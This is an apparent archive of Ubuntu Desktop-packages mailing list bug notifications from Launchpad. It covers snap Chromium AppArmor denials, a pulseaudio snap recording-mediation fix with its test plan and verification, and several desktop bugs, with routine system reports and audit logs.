LANG=de_DE.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=33f0c319-6f77-49d2-85ed-236d397fc004 ro quiet splash vt.handoff=7 ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1 Snap.ChromeDriverVersion: ChromeDriver 78.0.3904.70 (edb9c9f3de0247fd912a77b7f6cae7447f6d3ad5-refs/branch-heads/3904@{#800}) Snap.ChromiumVersion: Chromium 78.0.3904.70 snap Tags: eoan snap Uname: Linux 5.3.0-19-generic x86_64 UpgradeStatus: Upgraded to eoan on 2019-10-23 (14 days ago) UserGroups: adm cdrom daemon dialout dip docker kvm lpadmin plugdev sambashare sudo www-data _MarkForUpload: True dmi.bios.date: 04/19/2019 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: UX330UAK.315 dmi.board.asset.tag:
[Desktop-packages] [Bug 1855477] Re: gnome-control-center will not let me paste in a password from my password manger
Thank you for using Ubuntu and reporting a bug. Are you using wayland or Xorg for your desktop session? What password manager are you using? ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-control-center in Ubuntu. https://bugs.launchpad.net/bugs/1855477 Title: gnome-control-center will not let me paste in a password from my password manger Status in gnome-control-center package in Ubuntu: New Bug description: Gnome-control-center online-accounts will not let me paste my google password in.Since I use long secure complex passwords, typing in passwords is not a viable option. Please fix this bug. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-control-center/+bug/1855477/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1739468] Re: Repeated [AppIndicatorSupport-WARN] Item :1.51/org/ayatana/NotificationItem/multiload is already registered
Why is this low importance when anyone who has this issue should be quiting the application rendering it useless, seems pretty high to me. What else could possibly trump this? -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-shell-extension-appindicator in Ubuntu. https://bugs.launchpad.net/bugs/1739468 Title: Repeated [AppIndicatorSupport-WARN] Item :1.51/org/ayatana/NotificationItem/multiload is already registered Status in gnome-shell-extension-appindicator package in Ubuntu: Confirmed Status in indicator-multiload package in Ubuntu: Confirmed Bug description: The following message is continuously logged to /var/log/syslog (every few seconds): Dec 20 10:29:26 lxjima gnome-shell[13730]: [AppIndicatorSupport-WARN] Attempting to re-register :1.51/org/ayatana/NotificationItem/multiload; resetting instead Dec 20 10:29:26 lxjima gnome-shell[13730]: [AppIndicatorSupport-WARN] Item :1.51/org/ayatana/NotificationItem/multiload is already registered It's hard to find anything in syslog because thousands of these messages intermingle with everything else ProblemType: Bug DistroRelease: Ubuntu 17.10 Package: gnome-shell 3.26.2-0ubuntu0.1 ProcVersionSignature: Ubuntu 4.13.0-19.22-generic 4.13.13 Uname: Linux 4.13.0-19-generic x86_64 ApportVersion: 2.20.7-0ubuntu3.6 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Wed Dec 20 10:28:49 2017 DisplayManager: gdm3 InstallationDate: Installed on 2017-12-13 (7 days ago) InstallationMedia: Ubuntu 17.10 "Artful Aardvark" - Release amd64 (20171018) SourcePackage: gnome-shell UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-shell-extension-appindicator/+bug/1739468/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
https://github.com/snapcore/snapd/pull/7779 ** Also affects: snapd Importance: Undecided Status: New ** Changed in: snapd (Ubuntu) Assignee: Jamie Strandboge (jdstrand) => (unassigned) ** Changed in: snapd Importance: Undecided => Low ** Changed in: snapd Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: snapd Milestone: None => 2.42.3 ** Changed in: snapd (Ubuntu) Status: In Progress => Triaged ** Changed in: snapd Status: New => In Progress -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in AppArmor: Triaged Status in snapd: In Progress Status in chromium-browser package in Ubuntu: Invalid Status in snapd package in Ubuntu: Triaged Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
https://github.com/snapcore/snapd/pull/7779 ** Also affects: snapd Importance: Undecided Status: New ** Changed in: snapd Status: New => In Progress ** Changed in: snapd Importance: Undecided => Medium ** Changed in: snapd Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: snapd (Ubuntu) Status: In Progress => Triaged ** Changed in: snapd (Ubuntu) Importance: Undecided => Medium ** Changed in: snapd (Ubuntu) Assignee: Jamie Strandboge (jdstrand) => (unassigned) ** Changed in: snapd Milestone: None => 2.42.3 -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1851211 Title: [snap] SoloKeys not supported by u2f-devices interface Status in snapd: In Progress Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: Triaged Bug description: This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium- browser/+bug/1738164 it is still open. No chance to use such a key in the browser. dmesg output is: My dmesg out put shows a lot of DENIED: audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?' [ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 Suggested solutions in the other tickets do not work System is Ubuntu 19.10 on an Asus UX330 --- ProblemType: Bug ApportVersion: 2.20.11-0ubuntu8.2 Architecture: amd64 CurrentDesktop: ubuntu:GNOME DRM.card0-HDMI-A-1: enabled: enabled dpms: On status: connected edid-base64: AP///wAebcxW838CAAYUAQOANR54Cq7FoldKnCUSUFQhCACzAIGAgUABAQEBAQEBAQEBGjaAoHA4H0AwIDUAEyshAAAaAjqAGHE4LUBYLEUAEyshAAAe/QA4PR5TDwAKICAgICAg/ABXMjQ0MgogICAgICAgATICAyHxTpAEAwEUEgUfEBMAIwkHB4MBAABlAwwAEAACOoAYcTgtQFgsRQATKyEAAB4BHYAYcRwWIFgsJQATKyEAAJ4BHQByUdAeIG4oVQATKyEAAB6MCtCKIOAtEBA+lgATKyEAABgAJg== modes: 1920x1080 1920x1080 1920x1080 1920x1080 1920x1080i 1920x1080i 1920x1080i 1920x1080 1920x1080i 1680x1050 1280x1024 1280x960 1280x720 1280x720 1280x720 1280x720 1024x768 800x600 720x576 720x480 720x480 720x480 720x480 640x480 640x480 640x480 DRM.card0-eDP-1: enabled: disabled dpms: Off status: connected edid-base64: AP///wAGry0nABAZAQSVHRF4ArwFolVMmiUOUFQBAQEBAQEBAQEBAQEBAQEBFDeAuHA4JEAQED4AJaUQAAAY/gBBVU8KICAgICAgICAg/gBCMTMzSEFOMDIuNyAKAII= modes: 1920x1080 DiskUsage: Filesystem Type Size Used Avail Use% Mounted on /dev/sda6 ext4 184G 35G 140G 20% /home tmpfs tmpfs 7,8G 152M 7,7G 2% /dev/shm /dev/sda6 ext4 184G 35G 140G 20% /home DistroRelease: Ubuntu 19.10 InstallationDate: Installed on 2017-09-30 (766 days ago) InstallationMedia: Ubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0a2b Intel Corp. Bus 001 Device 003: ID 0bda:58d1 Realtek Semiconductor Corp. USB2.0 HD UVC WebCam Bus 001 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: ASUSTeK COMPUTER INC. UX330UAK Package: chromium-browser 77.0.3865.120-0ubuntu1.19.10.1 PackageArchitecture: a
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Installing 1:8.0-0ubuntu3.11 from xenial-proposed, the test plan and James' addition for mediation is preserved across snapd restart all works as expected. Marking as verification done. ** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes + + $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install test-snapd-audio-record --edge $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Installing 1:11.1-1ubuntu7.5 from bionic-proposed, the test plan and James' addition for mediation is preserved across snapd restart all works as expected. Marking as verification done. ** Tags removed: verification-needed-bionic ** Tags added: verification-done-bionic -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: Fix Committed Status in pulseaudio source package in Bionic: Fix Committed Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install test-snapd-audio-record --edge $ snap connections test-snapd-audio-record # record not connected Interface Plug
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: - $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap + $ sudo snap install test-snapd-pulseaudio --edge $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 - $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap + $ sudo snap install test-snapd-audio-record --edge $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
** Changed in: snapd (Ubuntu) Status: Triaged => In Progress -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1851211 Title: [snap] SoloKeys not supported by u2f-devices interface Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: In Progress Bug description: This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium- browser/+bug/1738164 it is still open. No chance to use such a key in the browser. dmesg output is: My dmesg out put shows a lot of DENIED: audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?' [ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 Suggested solutions in the other tickets do not work System is Ubuntu 19.10 on an Asus UX330 --- ProblemType: Bug ApportVersion: 2.20.11-0ubuntu8.2 Architecture: amd64 CurrentDesktop: ubuntu:GNOME DRM.card0-HDMI-A-1: enabled: enabled dpms: On status: connected edid-base64: AP///wAebcxW838CAAYUAQOANR54Cq7FoldKnCUSUFQhCACzAIGAgUABAQEBAQEBAQEBGjaAoHA4H0AwIDUAEyshAAAaAjqAGHE4LUBYLEUAEyshAAAe/QA4PR5TDwAKICAgICAg/ABXMjQ0MgogICAgICAgATICAyHxTpAEAwEUEgUfEBMAIwkHB4MBAABlAwwAEAACOoAYcTgtQFgsRQATKyEAAB4BHYAYcRwWIFgsJQATKyEAAJ4BHQByUdAeIG4oVQATKyEAAB6MCtCKIOAtEBA+lgATKyEAABgAJg== modes: 1920x1080 1920x1080 1920x1080 1920x1080 1920x1080i 1920x1080i 1920x1080i 1920x1080 1920x1080i 1680x1050 1280x1024 1280x960 1280x720 1280x720 1280x720 1280x720 1024x768 800x600 720x576 720x480 720x480 720x480 720x480 640x480 640x480 640x480 DRM.card0-eDP-1: enabled: disabled dpms: Off status: connected edid-base64: AP///wAGry0nABAZAQSVHRF4ArwFolVMmiUOUFQBAQEBAQEBAQEBAQEBAQEBFDeAuHA4JEAQED4AJaUQAAAY/gBBVU8KICAgICAgICAg/gBCMTMzSEFOMDIuNyAKAII= modes: 1920x1080 DiskUsage: Filesystem Type Size Used Avail Use% Mounted on /dev/sda6 ext4 184G 35G 140G 20% /home tmpfs tmpfs 7,8G 152M 7,7G 2% /dev/shm /dev/sda6 ext4 184G 35G 140G 20% /home DistroRelease: Ubuntu 19.10 InstallationDate: Installed on 2017-09-30 (766 days ago) InstallationMedia: Ubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0a2b Intel Corp. Bus 001 Device 003: ID 0bda:58d1 Realtek Semiconductor Corp. USB2.0 HD UVC WebCam Bus 001 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: ASUSTeK COMPUTER INC. UX330UAK Package: chromium-browser 77.0.3865.120-0ubuntu1.19.10.1 PackageArchitecture: amd64 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=33f0c319-6f77-49d2-85ed-236d397fc004 ro quiet splash vt.handoff=7 ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1 Snap.ChromeDriverVersion: ChromeDriver 78.0.3904.70 (edb9c9f3de0247fd912a77b7f6cae7447f6d3ad5-refs/branch-heads/3904@{#800}) Snap.ChromiumVersion: Chromium 78.0.3904.70 snap Tags: eoan snap Uname: Linux 5.3.0-19-generic x86_64 UpgradeStatus: Upgraded to eoan on 2019-10-23 (14 days ago) UserGroups: adm cdrom daemon dialout dip docker kvm lpadmin plugdev sambashare sudo www-data _MarkForUpload: True dmi.bios.date: 04/19/2019 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: UX330UAK.315 dmi.board.asset.tag: ATN12345678901234567
[Desktop-packages] [Bug 1778332] Re: Apparmor Permission Denied (apparmor="DENIED")
Clement, your issue is different than Charles'. More information is required from you to triage your issue. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu. https://bugs.launchpad.net/bugs/1778332 Title: Apparmor Permission Denied (apparmor="DENIED") Status in gnome-system-monitor package in Ubuntu: Expired Bug description: I try to launch the system monitor but nothing show up. journalctl -f Result: Jun 23 19:04:24 laptop-hostname audit[8109]: AVC apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid" Jun 23 19:04:24 laptop-hostname kernel: audit: type=1400 audit(1529751864.744:47): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid" Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: snap-update-ns failed with code 1: File exists Jun 23 19:04:28 laptop-hostname pkexec[8128]: pam_unix(polkit-1:session): session opened for user root by (uid=1000) /var/log/syslog Result: Jun 23 19:03:17 laptop-hostname kernel: [ 433.266715] audit: type=1400 audit(1529751797.796:42): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/snap/gnome-system-monitor/45/gnome-platform/" pid=7471 comm="3" srcname="/snap/gnome-3-26-1604/64/" flags="rw, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.799121 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/snap/gnome-3-26-1604/64 /snap/gnome-system-monitor/45/gnome-platform none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.833637 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/local/share/fonts /usr/local/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.301209] audit: type=1400 audit(1529751797.828:43): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/local/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.835300 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/share/fonts /usr/share/fonts none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.838094 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/var/cache/fontconfig /var/cache/fontconfig none bind,ro 0 0): permission denied Jun 23 19:03:17 laptop-hostname kernel: [ 433.302850] audit: type=1400 audit(1529751797.832:44): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind" Jun 23 19:03:17 laptop-hostname kernel: [ 433.305652] audit: 